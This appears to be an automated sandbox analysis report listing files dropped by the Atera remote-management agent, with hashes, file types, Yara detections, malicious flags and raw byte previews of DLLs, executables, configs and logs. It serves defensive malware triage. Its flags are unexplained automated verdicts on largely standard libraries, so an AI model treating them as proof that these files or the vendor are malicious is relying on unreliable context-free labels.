                                                                                                                                                                                                                                        SHA-512:F65C8EAB66C5C088FB85F16914D18ACB0E2B9B201BD37C5D30B8B0FD2DE2D0AD48C74912C4293ABF611A6A64FD76B3B9B61502993C9EA680723B22A3ED88A612
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ....................................@.................................dW..O....`...............B..0(..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.95553243429679
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:R784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRv:R7N1r9KGI04CCARLv
                                                                                                                                                                                                                                        MD5:F25FC027F62B2075901A6677EF81DC17
                                                                                                                                                                                                                                        SHA1:A7DAC5819431ACFFF9E91BCE7C6371B2A00507C5
                                                                                                                                                                                                                                        SHA-256:39CA7203DE9D6D026F5F1E27F00A5CA28133C0494E6F2E3ED55DD2F4F0893238
                                                                                                                                                                                                                                        SHA-512:2E51930198A5DA863A4B718A3772E88532EAE7C0E2C432618B3306F40AB141B6E7435246FE578AB7CABBA4A6BFC674F690484A27793965A6FBEB542F66BFBB40
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`......C.....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4019
                                                                                                                                                                                                                                        Entropy (8bit):5.254468395309833
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:W/gDO5ig8O5PgFO5/gYgOVOhVWgBNNXzHSxBNN4zPzRlXNzSPeZgg9dSjedcdS4b:WIkvZY6IH8afhbZh9A6qA4AAADjAN
                                                                                                                                                                                                                                        MD5:4017401B19043652DA66E659D10F50B9
                                                                                                                                                                                                                                        SHA1:5383454BAEEDC7E55D253BC6AFE6E2A80BD9906E
                                                                                                                                                                                                                                        SHA-256:A4F6728F5E2EB8D82463B67093CD2FDF814052C0C24FBE524ADCC0FE0E6B76D2
                                                                                                                                                                                                                                        SHA-512:CA8AE4FDE3D1E19BB3DF93741B5DD48BB2D2887B829538BAC3E6C5A367DFD48953D6DCC808209BD80924028FB294D95179BE18BF81A7F2B1EEB7A8CA4479DFA8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\log.txt, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:2024-10-02 11:20:38.4434|ERROR|WindowsWindowedEventLogProvider|Error on retry number 1: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:39.5372|ERROR|WindowsWindowedEventLogProvider|Error on retry number 2: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:41.5684|ERROR|WindowsWindowedEventLogProvider|Error on retry number 3: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...2024-10-02 11:20:44.5997|ERROR|WindowsWindowedEventLogProvider|Error initializing last processed events, ignoring file, exception: System.IO.FileNotFoundException: Could not find file 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\LastWindowedEventsProcessed.json'...File name: 'C:\Progr

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\package_2.db

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 12, cookie 0xb, schema 4, UTF-8, version-valid-for 19
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                        Entropy (8bit):0.9364170599017778
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:mu5C4OoNSN1eN+5NmgZDzWL8OO7QzyO+p+:z5PsveM57tzy8OO7QzyO+p
                                                                                                                                                                                                                                        MD5:1CC1E16C51F772AD8A67C84DEB5728A2
                                                                                                                                                                                                                                        SHA1:C7CCD9B79404ECF30F5263CC41765CB43C85C005
                                                                                                                                                                                                                                        SHA-256:49C69803312A22D6F42627D7C3F988FA39C4B6EB0475BB1F80BAFC99ED445ADA
                                                                                                                                                                                                                                        SHA-512:3D12DF7E66DE7BE3D9AE7767171A92283B8455C3EF90CE492CF81AE140417C35AD8E5F6EC0D5A81B1B3953A240B2E72DEF6BC9D5492814D5A8669F2665E5C03E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................c..............Z...?.j...I.:..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\package_2.db-journal

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                        File Type:SQLite Rollback Journal
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8720
                                                                                                                                                                                                                                        Entropy (8bit):1.8955064555671592
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:7MyqsFu5C4OZUlFJNGdNGveXXQXN+5NG1ZE:7nPu5C4OoNSN1eN+5NmE
                                                                                                                                                                                                                                        MD5:92D4C64B874A69F18C7C47719FA0DF0E
                                                                                                                                                                                                                                        SHA1:E105F160AC25A28C6815F690F5483456AFCD0B61
                                                                                                                                                                                                                                        SHA-256:672F02A160165CFA32AB6A95D021598CEC70DB5C5B1646753F051F9F8F614F9B
                                                                                                                                                                                                                                        SHA-512:D5B6AC6BE7AC461D38BD1D4F04C5B8D2B702DCBB58D09BDB68CB6CA3139C3104EBE27C3291E7D5E163B3F6AA05C35DAA37CF10D6A77014208D1B23DEA71E9DC6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.... .c....../{I........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1799216
                                                                                                                                                                                                                                        Entropy (8bit):6.5204766374461345
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:JuvfmOhyS2RuhV0yGzcuHpRs8ulCfUk+qKuMhUwqPevJ8QNYfjmqBBLbNFEohFYm:oHmUMohVWpu8ul0UkTgNCfyo3d
                                                                                                                                                                                                                                        MD5:D066C090D3416A1D082902E0A7EADD06
                                                                                                                                                                                                                                        SHA1:57B66D2450BC314003510657A6309F9921081EF5
                                                                                                                                                                                                                                        SHA-256:820867ABD8E1D48A769C6D8F8D8626CB2D9E492D71ABFB47F4BE7BEDEAB93C6E
                                                                                                                                                                                                                                        SHA-512:F0839808A716ABCF4BB392E4BB1B2D664D004FA519048C94FBA9623481DA87FE023DF94619A184E0F7F91DD02F63BB8FAC1013D09894F000661F438EE631C4C0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............g...g...g.>.....g.>...B.g.>.....g.3.....g......g...f.^.g../....g......g......g......g.Rich..g.................PE..d.....c.........." .................n...............................................P....`.........................................`t.......e..x....`.......@..`....L..0(...p.........8...........................@...p...............`............................text...$........................... ..`.rdata..............................@..@.data...0........z..................@....pdata..`....@......................@..@.rsrc........`......................@..@.reloc...,...p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1475632
                                                                                                                                                                                                                                        Entropy (8bit):6.7918990024107115
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:BS3uuk58wXpQous2GCzbHwGTzsIDQAKub0MBsIFBm5fi/5ATA9NTTPjXWJD8q6:gdwXpQdNVNDQubXyi60jXTW98q6
                                                                                                                                                                                                                                        MD5:E0C12F374C3CEDEED79A92B5279F838B
                                                                                                                                                                                                                                        SHA1:0FC4F192B32E9FC6C9FF24B9CB3129CDD925C845
                                                                                                                                                                                                                                        SHA-256:44FCAED823205977E5C1F6654C66EB9F51351F10B572CE6E914F4866B6D7B433
                                                                                                                                                                                                                                        SHA-512:AF965E825DC88BDBE35B9E7FC4A3FE360E9DE7751EE074E899BBAEF00FAD5158BB9E7A023D5FB79F0562BA4A30648A15C6B4AF363239B82FFC0F72C12BFB1095
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.rG^.!G^.!G^.!.._!d^.!..]!.^.!..^!.^.!.))!O^.!Y..!D^.!G^.!.^.!d.B!F^.!!.Z!F^.!!.Y!F^.!!.\!F^.!RichG^.!................PE..L...r.c...........!.........*.......:.......@......................................_.....@.........................0B..:....5..x....................\..0(.........pB..8............................1..@............@..0............................text...p-.......................... ..`.rdata..j....@.......2..............@..@.data...tt...`...T...N..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates.zip

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2949452
                                                                                                                                                                                                                                        Entropy (8bit):7.998766844143964
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:8Jk0/2eDY5iDZpreSKfF+fHpVIjjjO0jf511ImkTtI4BlZgtfZt3zw358e1jwv4j:eR2SRzrejcfHpajmMf+XjgBZZzQ55jR3
                                                                                                                                                                                                                                        MD5:8AD3A94767AC0F2C39C5881943A17478
                                                                                                                                                                                                                                        SHA1:91614E4C5B7C1B1CC849A867E39CF303341612D9
                                                                                                                                                                                                                                        SHA-256:F9516181C7AF49AD93FCE2259B6736D47E5A642A9EFF5CF01289A8A1E0831073
                                                                                                                                                                                                                                        SHA-512:356D84C1593F57AE9C4367E196BF876BC2F435215379DC9CF0B98F4DE201F168D3E84044FAF225A15D28B02D6CD95A7CE6EA085FD9AC1F0B44EC1D3ECCAB5905
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:PK..-.....b98Y)..=........6...AgentPackageOsUpdates/AgentPackageOsUpdates.Common.dll....0r.......>......7..JU`..U...n9...b'$...3+v.c.G]...,.[.........S=.....W..0~...o..s.M.....1.N.....v..@l....D...-.t...n/...ug....f.P....i..G...l..sv/...p.d].........^..`\..'/d._.n.....Ae......,.3R./Q...7HYa.1..g....A...z.a..._.X\(..*p..c...c.......Z.03..{...%sq8.{[..\.b<......d.$dDt.f....[%?U9..*.D..."....u.6...._.7.z....`8../..."A..?2.`....3b..(7I...K..:.3.Hy.....I..b.....7TK....ir.R.a3.hI..Ps..d.z...x..t..OB..#..5~.. sV.N.2.a...(...J...G..4&."..f.......Ct,..../C.....n.^./i.7....^q....6{i,..EG-..H...T.=h..-k....*...._.u.+$.9.Y.....G.../.-6...at...6..D.$..Q....6Y.....J...'..\b>....J`.r<.4s%. 8...k.....L!..e*........"....A2c.....G..h.bX.a..J.J.`..X...{bwc]U.z.-..).<..<X....t..3".d...3. ...z..2.*.L/..WFm....!.s,.}.;y..........@.j..=.....EC!/.m.\...`.Q6c$.O5'Jc_........6.#..5W;..9....cZ, ...$6.^!...?WF.....................<.a.:p.H..5.=j..-..f.5*....?........X

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):29232
                                                                                                                                                                                                                                        Entropy (8bit):6.346564683888365
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:RpYIrVWGYPHEUePsnhkgGIW7W8feKWDpQ6booNyb8E9VF6IYinAM+oC+5Vp4f:fTrVL3Ue0FSTuVboAEpYinAMxCcp4f
                                                                                                                                                                                                                                        MD5:BCC7C0981EBDCFBC51228BAE43844A6F
                                                                                                                                                                                                                                        SHA1:81A1ABEB9CCA5E54407CF362891EDF22D6B40318
                                                                                                                                                                                                                                        SHA-256:35A63B784B0025EF5283F810F8AF93C6E4B12727B2B657AF972DD49E88563AFE
                                                                                                                                                                                                                                        SHA-512:73261987335C6C37F02D027C605E8DE0EA41A14222010B16BBBF73C70DDCD4F01D6EB38D76CF5085D80E45C07164E0273796FC1E7F02575BEDE079C826734917
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I............." ..0..@...........^... ...`....... ...............................S....`.................................=^..O....`...............J..0(...........]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................q^......H........*...2..........................................................:.(......}....*..0..X.........(.......o......-.....>....o......2.,..o......,..o.......{....r...p...(....o..........*.(.......$..........&...........88.......0..M.........(......-.(...+..8.o....../.,..o.......{....r{..p.......(....o....(...+....*.......................&&.%.....0..].......~......o......-.~.....o..........o.....o........{....r...p......%...%...%...%...( ...o......*....................0..O...

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dll.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2006
                                                                                                                                                                                                                                        Entropy (8bit):5.012466327549389
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:327h+1/gF27RgdSagFsg+w3jdgDSg+CagFPr7:K4Mw9cr7
                                                                                                                                                                                                                                        MD5:DE33D7BC716E96683CCAEC7E3DECC54B
                                                                                                                                                                                                                                        SHA1:6CAC5E2AE17A91F55760F3652DD1D954CFE34848
                                                                                                                                                                                                                                        SHA-256:E9EC2DB29E1A7F44D6FAD976E29627E2EBCC1C9FD1797D56A69106260B70B65D
                                                                                                                                                                                                                                        SHA-512:353BF5BC4E47C7218CD3EECEE83301950FAA7D48644BEA3FE2F47B5AB432D43B466EBCF8E1A1911923EC423D30682A8FA42A3EA878E7D85C8E91EC841543B887
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):200240
                                                                                                                                                                                                                                        Entropy (8bit):5.751213785689997
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:zq1M5Ozcq7TAy5P+mIowb/m8Fh8bZyfT2tl2gJrPdniqiTjyrRuQf:OOOzxTLwb6bZL2kLFiqiTj0R5
                                                                                                                                                                                                                                        MD5:949A8A47B11A9950C27FE6F5FFC3A864
                                                                                                                                                                                                                                        SHA1:B1160033C950E88BA4A172E80746E34F78306F05
                                                                                                                                                                                                                                        SHA-256:940A8586DA9CFC9E0980BC541B275C9EF14657EB35BB1F6EA16ACDF5784116B2
                                                                                                                                                                                                                                        SHA-512:AB8FD5F7A7DF4F6E95D69766A808E10BA3297BA36CC199FA0B67DBB9D656B516C0FC7739DBDBB8E1D6D362BF9E585C8D159C8955CA21EE3649C5E9FC45364C2B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)..........."...0.................. ........@.. .......................@......t#....`.................................c...O.......4...............0(... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...4...........................@..@.reloc....... ......................@..B........................H.......$....$............................................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. K.. )UU.Z(.....{....o ...X )UU.Z(.....{....o!...X*...0..b........r...p......%..{.......%q.........-.&.+.......o"....%..{.......%q.........-.&.+.......o"....(#...*..{$...*..{%...*..{&...*..{'...*..{(...*..{)...*..(......}$.....}%.....}&......}'......}(......})...*..0...........u.......;..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1780
                                                                                                                                                                                                                                        Entropy (8bit):5.027025756159462
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:3rrL7h+1/gFSagFsg+w327RgdSg+CjdgDt:7r34owoR
                                                                                                                                                                                                                                        MD5:09CDFC3063DEC485A3C48111D5CEE297
                                                                                                                                                                                                                                        SHA1:02CEFEC66B6B2EEE120F97493D438F3B270AB5CA
                                                                                                                                                                                                                                        SHA-256:0ACF70AE533AF7D079F370AB3102B9563CA4C447C5DFC7A20C88AABE04295C01
                                                                                                                                                                                                                                        SHA-512:CA39056F79EFC8CE050FCCE1AAC21B2E7B62E65A0521E3CABF90C58A7249107658C2D208706FEC456CCC74D58DCDC22E23ECBAA43684613D4826505A426E1CB7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>..<startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2" /></startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.22.0.997" newVersion="2.22.0.997" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <depend

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.ini

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):12
                                                                                                                                                                                                                                        Entropy (8bit):3.418295834054489
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:WhU3n:Wg
                                                                                                                                                                                                                                        MD5:217EFB4CFD0E2FE659EB9238EA4C3121
                                                                                                                                                                                                                                        SHA1:956FF139442FAF8CBEA2940171559AF5BEE3B6E5
                                                                                                                                                                                                                                        SHA-256:05FD94189E503EFA8D3BD8CFC139A50FA2D4B6BFF702D1345D165E85CD09867D
                                                                                                                                                                                                                                        SHA-512:DCE527723D814EF4F435875E15028FCB7DE73AB73E9519F2D87AAEE3AF10BB6854C62BCCDF4786712F3746971B2CBB4C789C9FF7D9AB200B9DD2BA4734059E1A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:version=19.9

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):102448
                                                                                                                                                                                                                                        Entropy (8bit):6.190799321034417
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:APAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87HxO+:A2bYbYSWd85I5sSakFQhHL8V
                                                                                                                                                                                                                                        MD5:2707BB836BFC65D4376E2B8BCF0D63EC
                                                                                                                                                                                                                                        SHA1:E98AAD3AB9E526A0333451812B72EF283527FE87
                                                                                                                                                                                                                                        SHA-256:06E196BAD76BD3D049EED239FFF7A52F2997220644787827B1D86BCC07F7BAF8
                                                                                                                                                                                                                                        SHA-512:831C75370D31E9543D29F20094122A770C10474931AC8D01F77F9279FB05869691E554B68F8C92FA3F98F03F8BCB70ECBF6A9FCD18E87EE783A6DC7B8AD084FD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ....................................`.................................`}..O.......8............h..0(..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):95280
                                                                                                                                                                                                                                        Entropy (8bit):5.9971941696500854
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:84aRSNSrXS5EaKoDMsUVl0HAWMco2bJkj87HxsJ:84auS7S5Ea6WMcpu8c
                                                                                                                                                                                                                                        MD5:BE93D1C9AC8E66DDA6E5BED7055954EE
                                                                                                                                                                                                                                        SHA1:AFCC7792DA094C4E8FCA8F5021699EE12DF6A5FD
                                                                                                                                                                                                                                        SHA-256:665A41FAE1ED70797AC596FCD9EE2A3FF637EE2C64ECEE71853AC9CC03FBE472
